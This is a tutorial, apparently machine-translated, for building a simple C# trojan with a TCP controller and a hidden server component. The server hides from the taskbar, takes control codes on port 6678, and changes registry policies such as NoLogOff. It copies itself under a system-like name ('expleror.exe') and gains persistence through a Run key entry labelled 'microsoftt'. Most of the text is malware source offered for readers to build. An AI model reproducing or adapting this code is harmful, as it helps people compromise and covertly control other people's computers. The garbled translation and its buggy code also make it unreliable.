Some time ago, I wrote a program about the use of C # Trojan Horse (see before the program). Sorry, I didn't write the analysis, which makes everyone sad. Now I can add it to it :).
Preface:
My technology is not very good. If you want to learn the trojan technology, it may not inspire you. This article is intended for friends who want to learn C.
Trojan Introduction: (refer to the principle secrets of the Hacker defense line)
Because this program is a trojan program, some basic knowledge about the composition of the Trojan is described in advance, because these content will be mentioned in many places below. A complete Trojan system consists of hardware, software, and connection. This section mainly introduces the software, which consists of control-side programs, trojan programs (background service programs), and Trojan preparation programs. The control end is used to remotely control the programs on the server. A Trojan program is a program that sneak into the server to obtain its operation permissions. A Trojan preparation program is used to set the port number, trigger conditions, and Trojan name of the Trojan program, A more concealed program stored on the server.
Technologies used:
The control program sends control code to control the server, and runs on the server background. The Registry is modified to control the server. The technology is not very difficult. It mainly reflects the network programming and Registry Modification of C.
Control side development:
The control end sends a control code to the server. After receiving the control code, the server (Trojan program) completes the specified requirement according to the control requirements. If the server completes the work, a successful message is returned.
Control End development:
You can set the control code by yourself. You do not need to explain it in detail. The main difficulties are as follows.
1 Connection Request
The System. NET. Sockets. TcpClient class in the. Net class is used,
TcpClient (string hostname, int port)
Hostname is the name of the host to be controlled. You can also use an IP address.
Port is a Port.
// System. EventArgs contains the base class of the event data class
Private void button7_Click (object sender, System. EventArgs e)
{
// Record operations and add operation information to the richTextBox Control
RichTextBox1.AppendText ("request connection" + textBox1.Text + "\ r ");
Int port = 6678;
Try
{
// Initialize a new TcpClient instance and connect to the specified port on the specified host
Client = new TcpClient (textBox1.Text, port );
}
Catch
{
MessageBox. Show ("the server is not online! Are you sure you want to enter the host name .");
RichTextBox1.AppendText ("the server is not online! Are you sure you want to enter the host name .");
}
} // Private void buttion
2. Test whether it is connected to the controlled machine. The process of the program is to send the control code to check whether the control side has a response. If a response is returned, the control is successful.
// Provides network-accessed data streams
// Private NetworkStream;
The Code is as follows:
Private void button8_Click (object sender, System. EventArgs e)
{
// Record operations
RichTextBox1.AppendText ("test connection" + "\ r ");
Try
{
Stream = client. GetStream ();
If (stream. CanWrite)
{
// Send control code
String control = "jiance ";
Byte [] by = System. Text. Encoding. ASCII. GetBytes (control. ToCharArray ());
Stream. Write (by, 0, by. Length );
// Use it again
Stream. Flush ();
// Start the thread for receiving reverse data
// Receive is a function executed by a thread. For details, refer to the analysis below.
ThreadReceive = new Thread (new ThreadStart (receive ));
ThreadReceive. Start ();
}
}
Catch (Exception ee)
{
RichTextBox1.AppendText (ee. Message + "\ r ");
MessageBox. Show (ee. Message );
}
}
3. Control the effective code
Private void button9_Click (object sender, System. EventArgs e)
{
// Here is the control code to be sent. RadioButton is the form control.
If (radioButton1.Checked) {control = form2.zhucex ;}
Else if (radioButton2.Checked) {control = form3.zhuces ;}
Else if (radioButton3.Checked) {control = warring ;}
Else if (radioButton4.Checked) {control = suggest ;}
Else if (radioButton5.Checked) {control = form4.mumawe ;}
Else if (radioButton6.Checked) {control = drop ;}
If (control = "000000 ")
{
MessageBox. Show ("You have not entered any control targets! Do not send control signals ");
RichTextBox1.AppendText ("You have not entered any control targets! Do not send control signals ");
}
Else if (control! = "000000 ")
{
Try
{
// Record the operation
RichTextBox1.AppendText (control + "trying to control, waiting for response..." + "\ r ");
Stream = client. GetStream ();
If (stream. CanWrite)
{
Byte [] by = System. Text. Encoding. ASCII. GetBytes (control. ToCharArray ());
Stream. Write (by, 0, by. Length );
Stream. Flush ();
ThreadReceive = new Thread (new ThreadStart (receive ));
ThreadReceive. Start ();
} // Endif
} // Try
Catch
{
RichTextBox1.AppendText ("the server is not connected to 1. The control is invalid! "+" \ R ");
MessageBox. Show ("the server is not connected to 1. The control is invalid! "+" \ R ");
}
} // Else if
}
4. Functions executed by threads
Private void receive ()
{
// Set the space for reading data
Byte [] bb = new byte [3];
// Read 3 bytes, I is the actual number of bytes read
Int I = stream. Read (bb, 0, 3 );
// Convert to a string. If it is a Chinese control code, use string ss = // System. Text. Encoding. Unicode. GetString (bb );
String ss = System. Text. Encoding. ASCII. GetString (bb );
// Hjc indicates that the connection is successful, and hkz indicates that the control is successful.
If (ss = "hjc ")
{
MessageBox. Show ("connection successful ");
RichTextBox1.AppendText ("connection successful ");
}
If (ss = "hkz ")
{
RichTextBox1.AppendText (control + "control succeeded" + "\ r ");
MessageBox. Show (control + "control succeeded" + "\ r ");
}
}
Server development:
To implement the trojan service program, we mainly implement the following functions: running the background (hiding technology), receiving the control code, and modifying the Registry. We will introduce these three aspects:
1. in VC #, it is easy to create a background service program. First, create a new C # Windows application, project name customization (however, to hide the names similar to those of the system), set the "ShowInTaskbar" attribute of the form attribute to false so that it will not be displayed in the taskbar during running, set the "Windowstate" attribute to Mininized, so that the form can be hidden and run. Of course, you can also set it in InitializeComponent (). This function acts as initialization and runs before the display of the form. The Code is as follows:
Private void InitializeComponent ()
{
//
// Form1
//
// Start point and size of the form display
This. AutoScaleBaseSize = new System. Drawing. Size (6, 14 );
This. ClientSize = new System. Drawing. Size (368,357 );
// Form name
This. Name = "Form1 ";
// Set properties to run on the background
This. ShowInTaskbar = false;
This. Text = "Form1 ";
This. WindowState = System. Windows. Forms. FormWindowState. Minimized;
}
2. Control the receipt of code. It must be started when the service program starts. Therefore, the listening thread must be started during program initialization. Therefore, it is placed in the form constructor. The code annotation is as follows:
Public Form1 () // form Constructor
{
//
// Required for Windows Form Designer support
//
InitializeComponent ();
//
// TODO: add Any constructor code after InitializeComponent calls
// Add your listening code
// You can set the port. I have used a fixed port.
Int port = 6678;
// System. Net. Sockets. TcpListener is used to listen to the client in the Tcp network.
Listener = new TcpListener (port );
// Start listening
Listener. Start ();
// Add a Thread that receives control codes. To stop a Thread, Use Thread. abort ()
// ReControlCode is the function that the thread starts and executes. This function is controlled according to the received
// Select an appropriate registry modification function for the control code
Thread thread = new Thread (new ThreadStart (reControlCode ));
Thread. Start ();
}
The reControlCode function is as follows. For the complete code, see the program.
Private void reControlCode ()
{
// Set the receiving socket to receive the listener. AcceptSocket to return the received client request
Socket = listener. AcceptSocket ();
// If the connection is successfully executed
While (socket. Connected)
{
// Receive control code
Byte [] by = new byte [6];
Int I = socket. Receive (by, by. Length, 0 );
String ss = System. Text. Encoding. ASCII. GetString ();
// Perform different functions based on the control code
// Modify the registry and add the Encoding
Switch (ss)
{
Case "jiance": // test connection. Test information is returned.
String str = "hjc ";
Byte [] bytee = System. Text. Encoding. ASCII. GetBytes (str );
Socket. Send (bytee, 0, bytee. Length, 0 );
Break;
Case "zx1000 ":
// Modify the registry function and define it by yourself. See the following analysis.
UnLogOff ();
// Return Control Message
RetMessage ();
Break;
Case "zx0100 ":
// Modify the registry function
UnClose ();
// Return Control Message
RetMessage ();
Break;
// The duplicate case function is the same as the previous one.
Default:
Break;
} // Case
} // While
} // Private void reControlCode
3. c. system. microsoft. win32 command space, which provides two types of classes: the class for processing events caused by the operating system and the class for operating the system registry. We can see its usage below. Here I made a subroutine for modifying the Registry: so that the computer cannot log out. Before doing so, first understand the registry, in the sub-Key SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer
If the key value NoLogOff is set to 1 below, the computer cannot be logged out. Use C # In the following function to modify the registry:
Private void UnLogOff ()
{
// Obtain the top-level node of the host registry
Microsoft. Win32.RegistryKey rLocal = Registry. LocalMachine;
// Set a registry subkey variable
RegistryKey key1;
Try
{
// Function RegistryKey. OpenSubkey (string registrykey, bool canwrite)
// Registrykey is the key value specified by the user. If canwrite is set to true, it can be modified. The default value is fasle.
Key1 =
RLocal. OpenSubKey ("SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer", true );
// Set the key name and value of the subkey
Key1.SetValue ("NoLogOff", 1 );
// Close the opened sub-Key
Key1.Close ();
// Set the warning string
Mystr = mystr + "HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer key value Nologoff is modified! Set it to 0! ";
}
Catch {}
// If there is no self-created
If (key1 = null)
{
Try
{
// Use the RegistryKey. CreateSubKey (string mystring) function to create the required sub-Key
RegistryKey key2 = rLocal. CreateSubKey ("SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer ");
Key2.SetValue ("NoLogOff", 1 );
Key2.Close ();
Mystr = mystr + "HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer key value Nologoff is modified! Set it to 0! ";
}
Catch {}
}
}
4. Another important function in the Trojan program is self-replication and transfer. When a trojan is introduced to a controlled host, it must be automatically hidden in the System and System32 directories to prevent the trojan from being detected. The transfer code is analyzed as follows. The main function is to transfer the trojan program on drive d to C: \ winnnt \ system \ msdoss.exe and change the name. The. NET namespace System. IO is used to allow synchronous and asynchronous reading and writing of data streams and files. Here we use the System. IO. File class.
Private void moveCC1 ()
{
Try
{
// Function File. Move (string sourceFileName, string destFileName) to Move a File
// SourceFileName is the name of the file to be moved, and destFileName is the new path of the file.
File. Move ("C: \ winnnt \ system \ msdoss.exe", "d: \ winnt \ system32 \ expleror.exe ");
}
Catch {}
// Set the new Trojan to self-start. The analysis is the same as the previous one.
Try
{
Key1 = rLocal. OpenSubKey ("SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Run", true );
Key1.SetValue ("microsoftt", "d: \ winnt \ system32 \ expleror.exe ");
Key1.Close ();
}
Catch {}
If (key1 = null)
{
Try
{
RegistryKey key2 = rLocal. CreateSubKey ("SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Run ");
Key1.SetValue ("microsoftt", "d: \ winnt \ system32 \ expleror.exe ");
Key1.Close ();
}
Catch {}
}
} // MoveCC1 ()
Here, a simple C # Trojan is complete.
